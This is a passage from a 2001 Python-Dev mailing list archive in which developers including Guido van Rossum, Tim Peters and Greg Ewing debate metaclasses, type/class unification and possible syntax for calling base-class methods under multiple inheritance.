is a subclass of itself. -Michel From greg at cosc.canterbury.ac.nz Thu May 3 03:35:29 2001 From: greg at cosc.canterbury.ac.nz (Greg Ewing) Date: Thu, 03 May 2001 13:35:29 +1200 (NZST) Subject: [Python-Dev] Classes and Metaclasses in Smalltalk In-Reply-To: <3AEFCEBD.2E5979C9@lemburg.com> Message-ID: <200105030135.NAA16449@s454.cosc.canterbury.ac.nz> "M.-A. Lemburg" : > I'm not sure I can follow you here: DictType.__repr__ is the > representation method of the dictionary and not inherited > from TypeType, so there should be no problem. The problem is that DictType.__repr__ could mean either the unbound method for finding the repr of a dictionary, or the bound method for finding the repr of DictType itself. This ambiguity is inherent in the Python language as soon as you try to make classes into instances (which you have to do as a consequence of making types into classes). Greg Ewing, Computer Science Dept, +--------------------------------------+ University of Canterbury, | A citizen of NewZealandCorp, a | Christchurch, New Zealand | wholly-owned subsidiary of USA Inc. | greg at cosc.canterbury.ac.nz +--------------------------------------+ From greg at cosc.canterbury.ac.nz Thu May 3 05:15:41 2001 From: greg at cosc.canterbury.ac.nz (Greg Ewing) Date: Thu, 03 May 2001 15:15:41 +1200 (NZST) Subject: [Python-Dev] Classes and Metaclasses in Smalltalk In-Reply-To: Message-ID: <200105030315.PAA16465@s454.cosc.canterbury.ac.nz> Michel Pelletier : > I was under the impression > from talking to JimF that Smalltalk eventually stopped at a class > that is a subclass of itself. Some years ago, while playing with Sun's Postscript-based NeWS window system, I devised an OO language (called P) that got translated into PostScript. It had a very Smalltalk-like class/metaclass system, although rather simpler than what JimF described. As I remember, the kernel consisted of a little knot of about 6 classes with some interesting incestuous relationships between them. If anyone's interested, I could dig out the code and provide details of how it all worked. There might be some ideas that could be used in Python. (Programming in P felt a lot like programming in Python, by the way. If my name had been Guido, who knows where it might have led!) Greg Ewing, Computer Science Dept, +--------------------------------------+ University of Canterbury, | A citizen of NewZealandCorp, a | Christchurch, New Zealand | wholly-owned subsidiary of USA Inc. | greg at cosc.canterbury.ac.nz +--------------------------------------+ From greg at cosc.canterbury.ac.nz Thu May 3 05:25:12 2001 From: greg at cosc.canterbury.ac.nz (Greg Ewing) Date: Thu, 03 May 2001 15:25:12 +1200 (NZST) Subject: [Python-Dev] Classes and Metaclasses in Smalltalk In-Reply-To: <3AEFF710.9471.8025D7EA@localhost> Message-ID: <200105030325.PAA16469@s454.cosc.canterbury.ac.nz> Gordon McMillan : > I would like to see ... some discussion of the expected > pragmatic benefits. (That's a different topic from subclassing > types.) Actually, it's not -- the two issues are connected. Suppose we succeed in unifying types and classes. Then instead of classes being of type ClassType, they are now instances of ClassClass. So classes are also instances, or in other words, we have unified classes and instances. So even if we don't go as far as adding Smalltalk-style class-methods-via-metaclasses, we still have to deal with the fact that some things will be both classes and instances. Greg Ewing, Computer Science Dept, +--------------------------------------+ University of Canterbury, | A citizen of NewZealandCorp, a | Christchurch, New Zealand | wholly-owned subsidiary of USA Inc. | greg at cosc.canterbury.ac.nz +--------------------------------------+ From greg at cosc.canterbury.ac.nz Thu May 3 05:27:34 2001 From: greg at cosc.canterbury.ac.nz (Greg Ewing) Date: Thu, 03 May 2001 15:27:34 +1200 (NZST) Subject: [Python-Dev] Classes and Metaclasses in Smalltalk In-Reply-To: <200105021523.KAA32340@cj20424-a.reston1.va.home.com> Message-ID: <200105030327.PAA16472@s454.cosc.canterbury.ac.nz> Guido: > Actually, I think that what's in the __dict__ is just perfect I was thinking of backwards compatibility for people who are hacking the __dict__ of a class directly. If you don't care about that, the problem is simpler. Greg Ewing, Computer Science Dept, +--------------------------------------+ University of Canterbury, | A citizen of NewZealandCorp, a | Christchurch, New Zealand | wholly-owned subsidiary of USA Inc. | greg at cosc.canterbury.ac.nz +--------------------------------------+ From greg at cosc.canterbury.ac.nz Thu May 3 05:39:08 2001 From: greg at cosc.canterbury.ac.nz (Greg Ewing) Date: Thu, 03 May 2001 15:39:08 +1200 (NZST) Subject: IDEA for super (Re: [Python-Dev] Classes and Metaclasses in Smalltalk) In-Reply-To: <200105021511.KAA32271@cj20424-a.reston1.va.home.com> Message-ID: <200105030339.PAA16476@s454.cosc.canterbury.ac.nz> Guido: > Will we need to add a "::" operator to Python??? If so, I hope we can find a syntax that doesn't remind one of C++ so much... I have an idea! How about spelling super(self, MyBaseClass) as MyBaseClass[self] This can be thought of as a sort of "cast" which turns self into an object which behaves like it were an instance of MyBaseClass. Then we can write MyBaseClass[self].foo(args) Advantages: * Concise and uncluttered * No new syntax needed * Can be implemented using existing mechanisms * Doesn't even remotely resemble anything in C++ :-) Greg Ewing, Computer Science Dept, +--------------------------------------+ University of Canterbury, | A citizen of NewZealandCorp, a | Christchurch, New Zealand | wholly-owned subsidiary of USA Inc. | greg at cosc.canterbury.ac.nz +--------------------------------------+ From tim.one at home.com Thu May 3 07:49:04 2001 From: tim.one at home.com (Tim Peters) Date: Thu, 3 May 2001 01:49:04 -0400 Subject: [Python-Dev] Classes and Metaclasses in Smalltalk In-Reply-To: <3AF01381.592AE31B@lemburg.com> Message-ID: [MAL, on basemethods] > ... > In other words: you let Python continue the search for the method > as if it hadn't found the occurrance calling the bsaemethod() > API. Hmm, still not clear enough... better let Tim jump in here > (we've had a discussion about basemethod() some months or years > ago). Tim ? Sorry, I'm not sure what either of you is talking about. In class A(B, C): def foo(self): super.foo() Guido said that super would start searching at B, but I don't know what your "continue the search for the method as if it hadn't found the occurrance calling the bsaemethod() API" means: defining what a thing does in terms of an unspecified API it doesn't use is a pretty sure recipe for compounded confusion . Given that we're using Python's search rules, the ambiguous point remaining is whether: super.f() textually contained in a method of class K begins searching with: 1) K.__bases__ or with: 2) self.__class__.__bases__ Java uses #1, and Guido's "the search starts with B" implies that he would too. But it's unclear whether he meant that. Given also class D(A): def foo(self): super.foo() D().foo() both views agree that D.foo() is invoked first, and that D.foo() invokes A.foo() next. But under #1 A.foo() invokes C.foo() or D.foo() next, while under #2 A.foo() invokes A.foo() again. Multiple inheritance is a red herring here -- take C out of A's bases, and the same ambiguity needs to be resolved. From greg at cosc.canterbury.ac.nz Thu May 3 07:56:07 2001 From: greg at cosc.canterbury.ac.nz (Greg Ewing) Date: Thu, 03 May 2001 17:56:07 +1200 (NZST) Subject: [Python-Dev] Classes and Metaclasses in Smalltalk In-Reply-To: Message-ID: <200105030556.RAA16509@s454.cosc.canterbury.ac.nz> Tim: > Java uses #1, and Guido's "the search starts with B" implies that he would > too. But it's unclear whether he meant that. It's the only sane thing for him to mean, as far as I can see. Greg Ewing, Computer Science Dept, +--------------------------------------+ University of Canterbury, | A citizen of NewZealandCorp, a | Christchurch, New Zealand | wholly-owned subsidiary of USA Inc. | greg at cosc.canterbury.ac.nz +--------------------------------------+ From pf at artcom-gmbh.de Thu May 3 08:29:03 2001 From: pf at artcom-gmbh.de (Peter Funk) Date: Thu, 3 May 2001 08:29:03 +0200 (MEST) Subject: IDEA for super (Re: [Python-Dev] Classes and Metaclasses in Smalltalk) In-Reply-To: <200105030339.PAA16476@s454.cosc.canterbury.ac.nz> from Greg Ewing at "May 3, 2001 3:39: 8 pm" Message-ID: Hi, Greg Ewing: [...] > How about spelling super(self, MyBaseClass) as > > MyBaseClass[self] > > This can be thought of as a sort of "cast" which turns self > into an object which behaves like it were an instance of > MyBaseClass. Then we can write > > MyBaseClass[self].foo(args) > > Advantages: > * Concise and uncluttered > * No new syntax needed > * Can be implemented using existing mechanisms > * Doesn't even remotely resemble anything in C++ :-) Disadvantages: * People will confuse this with calling MyBaseClass.__getitem__(....) * Doesn't even remotely resemble anything in C++ We have to face it: I myself don't like C++ either, but a *lot* of people today are already familar with C++ today. Giving them something they are already familar with, will make it easier to convert some of them to Python. To Greg: This '::' operator is not at all that ugly and AFAI can see would not introduce any backward incompatible change to the language. I'm sure C++ has some other real warts to offer that we both don't want to see in a future version of Python. Right? Regards, Peter -- Peter Funk, Oldenburger Str.86, D-27777 Ganderkesee, Germany, Fax:+49 4222950260 office: +49 421 20419-0 (ArtCom GmbH, Grazer Str.8, D-28359 Bremen, Germany) From mal at lemburg.com Thu May 3 09:49:37 2001 From: mal at lemburg.com (M.-A. Lemburg) Date: Thu, 03 May 2001 09:49:37 +0200 Subject: [Python-Dev] Classes and Metaclasses in Smalltalk References: <200105030135.NAA16449@s454.cosc.canterbury.ac.nz> Message-ID: <3AF10D91.802C8555@lemburg.com> Greg Ewing wrote: > > "M.-A. Lemburg" : > > > I'm not sure I can follow you here: DictType.__repr__ is the > > representation method of the dictionary and not inherited > > from TypeType, so there should be no problem. > > The problem is that DictType.__repr__ could mean either > the unbound method for finding the repr of a dictionary, > or the bound method for finding the repr of DictType > itself. > > This ambiguity is inherent in the Python language as soon > as you try to make classes into instances (which you have > to do as a consequence of making types into classes). We are actually trying to turn classes into types here :-) Really, I think that we could resolve this issue by not inheriting from meta-classes. DictType is a creation of the meta-class TypeType. I'm not calling these instances to prevent additional confusion. The root of the problem is that for some reason there is belief that DictType should implicitly inherit attributes and methods from TypeType. If we simply say that there is no implicit inheritance (only explicit one), then these problems should go away. Some of these ideas are burried in the "super" part of this thread. Unfortunately this concept doesn't go very far since Python has multiple inheritance and thus the term "super" (referring to the class' single base class) is not well-defined. As Jim mentioned in his reply to Thomas' question, SmallTalk has two parallel hierarchies. One for the classes and one for the meta-classes. If we follow the same path in Python and keep the two well separated, I think we can resolve many of the issues which are currently showing up. To link the two hierarchies together we don't need a "super" concept, but instead a way to reach the meta-class in charge of a class, say "klass.__creator__". Note that there's another issue hiding in all this and again this is due to multiple inheritance: which meta-class is in charge of a class which is derived from two classes having different meta-classes ? meta1 --> o klass1 o klass1a o klass1b meta2 --> o klass2 o klass2a o klass2b class klass3(klass1a, klass2b): ... I think there's no clean way to resolve this, so I'd suggest to simply rule this out and declare it illegal (class can only be based on classes having the same meta-class). -- Marc-Andre Lemburg ______________________________________________________________________ Company & Consulting: http://www.egenix.com/ Python Software: http://www.lemburg.com/python/ From barry at digicool.com Thu May 3 10:24:16 2001 From: barry at digicool.com (Barry A. Warsaw) Date: Thu, 3 May 2001 04:24:16 -0400 Subject: [Python-Dev] "data".decode(encoding) ?! References: <3AF04E3D.45AE4F4B@lemburg.com> <200105021918.OAA03080@cj20424-a.reston1.va.home.com> <3AF052CE.E928BDA1@lemburg.com> <200105021938.OAA03550@cj20424-a.reston1.va.home.com> <3AF0662D.48671B4E@lemburg.com> <3AF06FCE.854D4DF7@lemburg.com> Message-ID: <15089.5552.164307.344721@anthem.wooz.org> >>>>> "M" == M writes: M> Here's a little fun codec to play with. It encodes the input M> using the ROT13 encoding (which is 1-1 and idempotent). LOL! Guess what `language' I chose to use when testing Mailman's i18n support? :) -Barry From fredrik at pythonware.com Thu May 3 10:11:10 2001 From: fredrik at pythonware.com (Fredrik Lundh) Date: Thu, 3 May 2001 10:11:10 +0200 Subject: [Python-Dev] "data".decode(encoding) ?! References: <3AF04E3D.45AE4F4B@lemburg.com> <200105021918.OAA03080@cj20424-a.reston1.va.home.com> <3AF052CE.E928BDA1@lemburg.com> <200105021938.OAA03550@cj20424-a.reston1.va.home.com> <3AF0662D.48671B4E@lemburg.com> <3AF06FCE.854D4DF7@lemburg.com> Message-ID: <028a01c0d3a8$9e05f190$e46940d5@hagrid> mal wrote: > Here's some sample output (Netscape can unscramble this BTW): heh. just discovered that outlook express can deal with this too -- but only if the message comes from the usenet. on ordinary mail, the "unscramble rot13" menu entry is disabled (too much usability testing?) maybe you could repost your secret message to comp.lang.python ;-) Cheers /F From mal at lemburg.com Thu May 3 11:05:41 2001 From: mal at lemburg.com (M.-A. Lemburg) Date: Thu, 03 May 2001 11:05:41 +0200 Subject: [Python-Dev] "data".decode(encoding) ?! References: <3AF04E3D.45AE4F4B@lemburg.com> <200105021918.OAA03080@cj20424-a.reston1.va.home.com> <3AF052CE.E928BDA1@lemburg.com> <200105021938.OAA03550@cj20424-a.reston1.va.home.com> <3AF0662D.48671B4E@lemburg.com> <3AF06FCE.854D4DF7@lemburg.com> <028a01c0d3a8$9e05f190$e46940d5@hagrid> Message-ID: <3AF11F65.5CBF508C@lemburg.com> Fredrik Lundh wrote: > > mal wrote: > > > Here's some sample output (Netscape can unscramble this BTW): > > heh. just discovered that outlook express can deal with this > too -- but only if the message comes from the usenet. > > on ordinary mail, the "unscramble rot13" menu entry is disabled > (too much usability testing?) > > maybe you could repost your secret message to comp.lang.python ;-) It wasn't all that secret: I simply cut&pasted the first two paragraphs of the message through the codec. There was also an inaccuracy in the posting: the codec still produces Unicode (by virtue of using the charmap codec as basis). Still, it serves as nice example of what str.decode() and str.encode() can be used for and also demonstrates how easy it is to install new codecs. I think I'll repost it to c.l.p though -- with a new secret attached to it ;-) -- Marc-Andre Lemburg ______________________________________________________________________ Company & Consulting: http://www.egenix.com/ Python Software: http://www.lemburg.com/python/ From guido at digicool.com Thu May 3 16:26:22 2001 From: guido at digicool.com (Guido van Rossum) Date: Thu, 03 May 2001 09:26:22 -0500 Subject: [Python-Dev] Classes and Metaclasses in Smalltalk In-Reply-To: Your message of "Thu, 03 May 2001 09:49:37 +0200." <3AF10D91.802C8555@lemburg.com> References: <200105030135.NAA16449@s454.cosc.canterbury.ac.nz> <3AF10D91.802C8555@lemburg.com> Message-ID: <200105031426.JAA07372@cj20424-a.reston1.va.home.com> > We are actually trying to turn classes into types here :-) Yes! Wait till you see my next batch of checkins. :-) > Really, I think that we could resolve this issue by not inheriting > from meta-classes. DictType is a creation of the meta-class > TypeType. I'm not calling these instances to prevent additional > confusion. The root of the problem is that for some reason there > is belief that DictType should implicitly inherit attributes and > methods from TypeType. If we simply say that there is no implicit > inheritance (only explicit one), then these problems should go > away. Sorry, you still seem to be confused about this. As I tried to explain before, DictType does not *inherit* from TypeType, but it is an *instance* of TypeType. TypeType defines a __repr__() method for all its instances. This is needed so that repr(DictType) returns "". It is *not* inherited from TypeType! If DictType were to inherit from something, it would inherit from the (not yet existing) ObjectType. ObjectType would have a __repr__ method too: it returns "". But this method is overridden by DictType, so doesn't come into play. Requiring explicit inheritance (whatever that may be) won't fix the problem. > Some of these ideas are burried in the "super" part of this > thread. Unfortunately this concept doesn't go very far since > Python has multiple inheritance and thus the term "super" > (referring to the class' single base class) is not well-defined. Not true. While super can't always refer to a single class, the use of super can be completely well-defined in an unambiguous way. Given class D(A, B, C): def foo(self): super.foo(self) "super.foo" is whatever would be called in D1 if we changed the class hierarchy as follows: class D1(A, B, C): pass class D(D1): def foo(self): D1.foo(self) The problem with super is not that it isn't well-defined. Its problem is that it's not enough to do what you want. In some situations involving multiple inheritance, it can be essential to be able to "merge" methods of the sane name defined in each of the base classes, e.g. class C(A, B): def save(self): A.save(self) B.save(self) So we can't use super as an argument to abandon explicitly naming the base class of base methods. Out of the proposed spellings that I can remember: B.save(self) # current Python B.__dict__['save'](self) # ditto, butt ugly B::save(self) # C++ B._.save(self) # Don Beaudry B.instanceMethods.save(self) # ??? I still like current Python best! > As Jim mentioned in his reply to Thomas' question, SmallTalk > has two parallel hierarchies. One for the classes and one for > the meta-classes. If we follow the same path in Python and > keep the two well separated, I think we can resolve many of > the issues which are currently showing up. Yeah, but this is not the path that Python has already taken (and which has been beaten further by Jim Fulton's ExtensionClasses). Python's path is "turtles all the way down". See also my old head-exploding metaclasses paper. > To link the two hierarchies together we don't need a "super" > concept, but instead a way to reach the meta-class in charge > of a class, say "klass.__creator__". Your confusion between the "isInstanceOf" and "isInheritedFrom" relationships seems really deep! Super relates to inheritance. Metaclasses relate to instantiation (of the class, as an instance of the metaclass). > Note that there's another issue hiding in all this and again > this is due to multiple inheritance: which meta-class is in > charge of a class which is derived from two classes having > different meta-classes ? > > meta1 --> o klass1 > o klass1a > o klass1b > meta2 --> o klass2 > o klass2a > o klass2b > > class klass3(klass1a, klass2b): > ... > > I think there's no clean way to resolve this, so I'd suggest > to simply rule this out and declare it illegal (class can > only be based on classes having the same meta-class). Unfortunately, again thanks to Jim Fulton, we can't rule this out, because this is actually used by ExtensionClasses. The rule (as I interpret it) gives the first base class control; if the first base class is a standard class, it looks if any of the other base classes are not standard classes, and if so, gives control to the first such base class. Another way to say this is that the first base class that has a non-standard metaclass gets control. (ExtensionClasses implements an additional rule where it requires all except one of the base classes to define no instance variables. This is an example of the importance of metaclasses done right: the metaclass has control over such issues. I don't think that Smalltalk's metaclasses have this much control -- you pretty much have a 1-1 correspondence between class and metaclass. --Guido van Rossum (home page: http://www.python.org/~guido/) From guido at digicool.com Thu May 3 16:28:03 2001 From: guido at digicool.com (Guido van Rossum) Date: Thu, 03 May 2001 09:28:03 -0500 Subject: [Python-Dev] Classes and Metaclasses in Smalltalk In-Reply-To: Your message of "Thu, 03 May 2001 15:27:34 +1200." <200105030327.PAA16472@s454.cosc.canterbury.ac.nz> References: <200105030327.PAA16472@s454.cosc.canterbury.ac.nz> Message-ID: <200105031428.JAA07405@cj20424-a.reston1.va.home.com> > Guido: > > > Actually, I think that what's in the __dict__ is just perfect > > I was thinking of backwards compatibility for people who > are hacking the __dict__ of a class directly. Depending on how they hack it, it may still work. > If you don't care about that, the problem is simpler. --Guido van Rossum (home page: http://www.python.org/~guido/) From skip at pobox.com Thu May 3 16:26:51 2001 From: skip at pobox.com (skip at pobox.com) Date: Thu, 3 May 2001 09:26:51 -0500 Subject: [Python-Dev] OT: CVS access through firewall via SSH Message-ID: <15089.27307.136251.862692@beluga.mojam.com> Python-dev folks, Sorry for the off-topic post, but I'm striking out on the various other sources I've located so far. Since this group seemed to have a love-hate relationship with CVS for awhile I thought maybe someone here would be able to steer me in the right direction. I have to access a CVS repository through a firewall via SSH. That is, to get to "server" I have to tunnel through "firewall" using SSH to port "nnn". Using SSH to establish an interactive session to server is no problem: ssh -p nnn firewall When I'm inside the firewall, I use a CVSROOT that looks like :pserver:montanaro at server:/cvs/projects I need to merge the two bits somehow to come up with a CVSROOT that will do the tunnel automagically. I've tried this: :pserver:montanaro at firewall:nnn/cvs/projects but CVS complains cvs [update aborted]: connect to firewall:2401 failed: Connection refused (port 2401 is the normal CVS port). Any suggestions or pointers? Thanks, Skip From mal at lemburg.com Thu May 3 18:08:30 2001 From: mal at lemburg.com (M.-A. Lemburg) Date: Thu, 03 May 2001 18:08:30 +0200 Subject: [Python-Dev] Classes and Metaclasses in Smalltalk References: <200105030135.NAA16449@s454.cosc.canterbury.ac.nz> <3AF10D91.802C8555@lemburg.com> <200105031426.JAA07372@cj20424-a.reston1.va.home.com> Message-ID: <3AF1827E.E730F5DE@lemburg.com> Guido van Rossum wrote: > > > We are actually trying to turn classes into types here :-) > > Yes! Wait till you see my next batch of checkins. :-) Looking forward to them :) BTW, can you give a good starting point into all this (code wise and concept wise) ? I'd like to play around these new concepts a litte to get a beeter feeling for the possible issues (I should have done the same for the coercion stuff a year ago: implementing mxNumber I now find that some important hooks are missing :-(). > > Really, I think that we could resolve this issue by not inheriting > > from meta-classes. DictType is a creation of the meta-class > > TypeType. I'm not calling these instances to prevent additional > > confusion. The root of the problem is that for some reason there > > is belief that DictType should implicitly inherit attributes and > > methods from TypeType. If we simply say that there is no implicit > > inheritance (only explicit one), then these problems should go > > away. > > Sorry, you still seem to be confused about this. I think it has to do with terminology: when I say "inherit" I actually mean "the lookup is forwarded to the another object". In that sense, instances inherit from their classes and classes from their base-classes: meta-class M -> o base-class A o class B o instance x = B() Meta-class M control this "inheritance scheme" and can modify it depending on its needs. Here's a scenario of what I have in mind: In the above picture, say A defines an attribute A.a which is not defined in B or as instance attribute of B(). Querying x.a would then launch this process: 1. x.a -> fails 2. M.__findattr__(x, 'a') is called to find and return the attribute 3. M.__findattr__ asks B for an attribute 'a' -> fails 4. -- " -- asks A -- " -- -> success 5. -- " -- returns the found attribute I know that this is somewhat different under the covers than what's happening now, but the Python programmer will not notice this. It most probably does not work well with the Don Beaudry hook though... so maybe I'm simply on the wrong track here. > As I tried to > explain before, DictType does not *inherit* from TypeType, but it is > an *instance* of TypeType. TypeType defines a __repr__() method for > all its instances. This is needed so that repr(DictType) returns > "". It is *not* inherited from TypeType! > > If DictType were to inherit from something, it would inherit from the > (not yet existing) ObjectType. ObjectType would have a __repr__ > method too: it returns "". > > But this method is overridden by DictType, so doesn't come into play. > > Requiring explicit inheritance (whatever that may be) won't fix the > problem. With "explicit inheritance" I meant that the programmer has to take care of passing the lookup on to the meta-class, rather than applying some magic which hooks together class and meta- class. > > Some of these ideas are burried in the "super" part of this > > thread. Unfortunately this concept doesn't go very far since > > Python has multiple inheritance and thus the term "super" > > (referring to the class' single base class) is not well-defined. > > Not true. While super can't always refer to a single class, the use > of super can be completely well-defined in an unambiguous way. Given > > class D(A, B, C): > def foo(self): > super.foo(self) > > "super.foo" is whatever would be called in D1 if we changed the class > hierarchy as follows: > > class D1(A, B, C): pass > class D(D1): > def foo(self): > D1.foo(self) Nice trick -- much like the "+0" trick in math ;-) > The problem with super is not that it isn't well-defined. Its problem > is that it's not enough to do what you want. In some situations > involving multiple inheritance, it can be essential to be able to > "merge" methods of the sane name defined in each of the base classes, > e.g. > > class C(A, B): > def save(self): > A.save(self) > B.save(self) > > So we can't use super as an argument to abandon explicitly naming the > base class of base methods. Out of the proposed spellings that I can > remember: > > B.save(self) # current Python > B.__dict__['save'](self) # ditto, butt ugly > B::save(self) # C++ > B._.save(self) # Don Beaudry > B.instanceMethods.save(self) # ??? > > I still like current Python best! But it doesn't help us in the very common case of mixin classes since there the method and sometimes even not the programmer will know where the basemethod to call lives. This is why I wrote the basemethod() helper: it looks up the right method at run-time and thus allows writing mixin-classes which override methods of other classes which are only known to the programmer using the mixin and not necessarily to the one writing the mixin. > > As Jim mentioned in his reply to Thomas' question, SmallTalk > > has two parallel hierarchies. One for the classes and one for > > the meta-classes. If we follow the same path in Python and > > keep the two well separated, I think we can resolve many of > > the issues which are currently showing up. > > Yeah, but this is not the path that Python has already taken (and > which has been beaten further by Jim Fulton's ExtensionClasses). > Python's path is "turtles all the way down". See also my old > head-exploding metaclasses paper. I know... I was under the impression, though, that a little breakage under the covers is allowed when moving from type/classes to all types. > > To link the two hierarchies together we don't need a "super" > > concept, but instead a way to reach the meta-class in charge > > of a class, say "klass.__creator__". > > Your confusion between the "isInstanceOf" and "isInheritedFrom" > relationships seems really deep! Super relates to inheritance. > Metaclasses relate to instantiation (of the class, as an instance of > the metaclass). See above... I don't like implicitely binding creation of objects with lookup paths. These two concepts don't belong together, IMHO, since they introduce restrictions which are not really necessary. (I have made some great experience with loosly coupled object systems and don't want to miss their flexibility anymore.) > > Note that there's another issue hiding in all this and again > > this is due to multiple inheritance: which meta-class is in > > charge of a class which is derived from two classes having > > different meta-classes ? > > > > meta1 --> o klass1 > > o klass1a > > o klass1b > > meta2 --> o klass2 > > o klass2a > > o klass2b > > > > class klass3(klass1a, klass2b): > > ... > > > > I think there's no clean way to resolve this, so I'd suggest > > to simply rule this out and declare it illegal (class can > > only be based on classes having the same meta-class). > > Unfortunately, again thanks to Jim Fulton, we can't rule this out, > because this is actually used by ExtensionClasses. The rule (as I > interpret it) gives the first base class control; if the first base > class is a standard class, it looks if any of the other base classes > are not standard classes, and if so, gives control to the first such > base class. Another way to say this is that the first base class that > has a non-standard metaclass gets control. Ouch. Still, since Jim's in control of ExtensionClass -- wouldn't it be possible to adapt ExtensionClass to an altered scheme ? > (ExtensionClasses implements an additional rule where it requires all > except one of the base classes to define no instance variables. This > is an example of the importance of metaclasses done right: the > metaclass has control over such issues. I don't think that > Smalltalk's metaclasses have this much control -- you pretty much have > a 1-1 correspondence between class and metaclass. Right: more power to the meta-class :-) -- Marc-Andre Lemburg ______________________________________________________________________ Company & Consulting: http://www.egenix.com/ Python Software: http://www.lemburg.com/python/ From paul at pfdubois.com Thu May 3 18:24:40 2001 From: paul at pfdubois.com (Paul F. Dubois) Date: Thu, 3 May 2001 09:24:40 -0700 Subject: [Python-Dev] Multiple inheritance Message-ID: Pardon if this is brief and suggestive only, I am on deadlines. Super is a mistaken concept in multiple inheritance languages. Fortunately, Python is not brain-damaged. Its multiple inheritance model can be fixed easily to be fully capable. Here is a suggestive example of implementing the Eiffel model (the only one that is theoretically sound) using "pretend" Python syntax (keyword conservationists might like "import" where I have "rename"): 1. The simple case, X inherits from Y and in defining foo and bar needs to use Y's version: class X (Y rename foo as _sfoo, bar as _sbar ): def foo (self): self._sfoo() myfoostuff Suppose D inherits from B and C, which both inherit from A. A has a method a1 that is redefined in B but not in C. D wishes to use both A's version as inherited via C and B's version. class D (B rename a1 as ba1, C rename a1 as ca1): can now use self.ca1, self.a1 Renaming is also useful where you inherit from a utility class and the lingo is different in the class where you want to use it. E.g. class Window (Tree rename children as subWindows) Reference: Meyer, B. "Object-Oriented Software Construction", 2nd Edition. From donb at abinitio.com Thu May 3 18:47:29 2001 From: donb at abinitio.com (Donald Beaudry) Date: Thu, 03 May 2001 12:47:29 -0400 Subject: [Python-Dev] Classes and Metaclasses in Smalltalk References: Message-ID: <200105031647.MAA25803@localhost.localdomain> "Tim Peters" wrote, > Given that we're using Python's search rules, the ambiguous point remaining > is whether: > > super.f() > > textually contained in a method of class K begins searching with: > > 1) K.__bases__ > > or with: > > 2) self.__class__.__bases__ It can only be 1. The using 2 will only be correct if you are in a method defined on a leaf class. If not in a leaf, the search will find the method you are already in... recursion is likely to terminate in a stack overflow ;) -- Donald Beaudry Ab Initio Software Corp. 201 Spring Street donb at init.com Lexington, MA 02421 ...So much code, so little time... From guido at digicool.com Thu May 3 20:48:19 2001 From: guido at digicool.com (Guido van Rossum) Date: Thu, 03 May 2001 14:48:19 -0400 Subject: [Python-Dev] Multiple inheritance In-Reply-To: Your message of "Thu, 03 May 2001 09:24:40 PDT." References: Message-ID: <200105031848.f43ImKg14308@odiug.digicool.com> From guido at digicool.com Thu May 3 20:50:30 2001 From: guido at digicool.com (Guido van Rossum) Date: Thu, 03 May 2001 14:50:30 -0400 Subject: [Python-Dev] Multiple inheritance In-Reply-To: Your message of "Thu, 03 May 2001 09:24:40 PDT." References: Message-ID: <200105031850.f43IoVf14328@odiug.digicool.com> > Pardon if this is brief and suggestive only, I am on deadlines. No problem. We appreciate it! > Super is a mistaken concept in multiple inheritance languages. Fortunately, > Python is not brain-damaged. Its multiple inheritance model can be fixed > easily to be fully capable. > > Here is a suggestive example of implementing the Eiffel model (the only one > that is theoretically sound) using "pretend" Python syntax (keyword > conservationists might like "import" where I have "rename"): > > > 1. The simple case, X inherits from Y and in defining foo and bar needs to > use Y's version: > > class X (Y rename foo as _sfoo, > bar as _sbar > ): > def foo (self): > self._sfoo() > myfoostuff Nice! This is similar to Jeremy's favorite way of spelling "super": class X(Y): Yfoo = Y.foo def foo(self): self.Yfoo() myfoostuff > Suppose D inherits from B and C, which both inherit from A. > A has a method a1 that is redefined in B but not in C. > D wishes to use both A's version as inherited via C and B's version. > > class D (B rename a1 as ba1, C rename a1 as ca1): > > can now use self.ca1, self.a1 > > Renaming is also useful where you inherit from a utility class and the lingo > is different in the class where you want to use it. E.g. class Window (Tree > rename children as subWindows) > > Reference: Meyer, B. "Object-Oriented Software Construction", 2nd Edition. Yes. --Guido van Rossum (home page: http://www.python.org/~guido/) From jepler at inetnebr.com Thu May 3 20:17:16 2001 From: jepler at inetnebr.com (Jeff Epler) Date: Thu, 3 May 2001 13:17:16 -0500 Subject: [Python-Dev] Multiple inheritance In-Reply-To: ; from paul@pfdubois.com on Thu, May 03, 2001 at 09:24:40AM -0700 References: Message-ID: <20010503131714.D21814@inetnebr.com> On Thu, May 03, 2001 at 09:24:40AM -0700, Paul F. Dubois wrote: > class X (Y rename foo as _sfoo, > bar as _sbar > ): Why not let us spell this as: class X(Y): from Y import foo as _sfoo, bar as _sbar ... Of course, then you can spell inheritance as class X: from Y import * Right? :) Jeff From nas at python.ca Thu May 3 21:05:37 2001 From: nas at python.ca (Neil Schemenauer) Date: Thu, 3 May 2001 12:05:37 -0700 Subject: [Python-Dev] Multiple inheritance In-Reply-To: <20010503131714.D21814@inetnebr.com>; from jepler@inetnebr.com on Thu, May 03, 2001 at 01:17:16PM -0500 References: <20010503131714.D21814@inetnebr.com> Message-ID: <20010503120537.A13708@glacier.fnational.com> Jeff Epler wrote: > On Thu, May 03, 2001 at 09:24:40AM -0700, Paul F. Dubois wrote: > > class X (Y rename foo as _sfoo, > > bar as _sbar > > ): > > Why not let us spell this as: > class X(Y): > from Y import foo as _sfoo, bar as _sbar > ... This already has a meaning in Python. Paul's suggested syntax is pretty neat, IMHO. Neil From trentm at ActiveState.com Thu May 3 21:39:27 2001 From: trentm at ActiveState.com (Trent Mick) Date: Thu, 3 May 2001 12:39:27 -0700 Subject: [Python-Dev] Multiple inheritance In-Reply-To: <20010503120537.A13708@glacier.fnational.com>; from nas@python.ca on Thu, May 03, 2001 at 12:05:37PM -0700 References: <20010503131714.D21814@inetnebr.com> <20010503120537.A13708@glacier.fnational.com> Message-ID: <20010503123927.B30837@ActiveState.com> On Thu, May 03, 2001 at 12:05:37PM -0700, Neil Schemenauer wrote: > Jeff Epler wrote: > > On Thu, May 03, 2001 at 09:24:40AM -0700, Paul F. Dubois wrote: > > > class X (Y rename foo as _sfoo, > > > bar as _sbar > > > ): > > > > Why not let us spell this as: > > class X(Y): > > from Y import foo as _sfoo, bar as _sbar > > ... > > This already has a meaning in Python. Paul's suggested syntax is > pretty neat, IMHO. Ditto but how to you separate the "rename" lists for multiple inheritance? class X (Y rename foo as _sfoo, bar as _sbar; Z): pass ^---- what to use here How about: class X(Y, Z): from Y inherit foo as _yfoo, bar as _ybar from Z inherit foo as _zfoo, bar as _zbar Hmmmmm. Don't know if I like that either. Just throwing out ideas. Trent -- Trent Mick TrentM at ActiveState.com From greg at cosc.canterbury.ac.nz Fri May 4 06:25:08 2001 From: greg at cosc.canterbury.ac.nz (Greg Ewing) Date: Fri, 04 May 2001 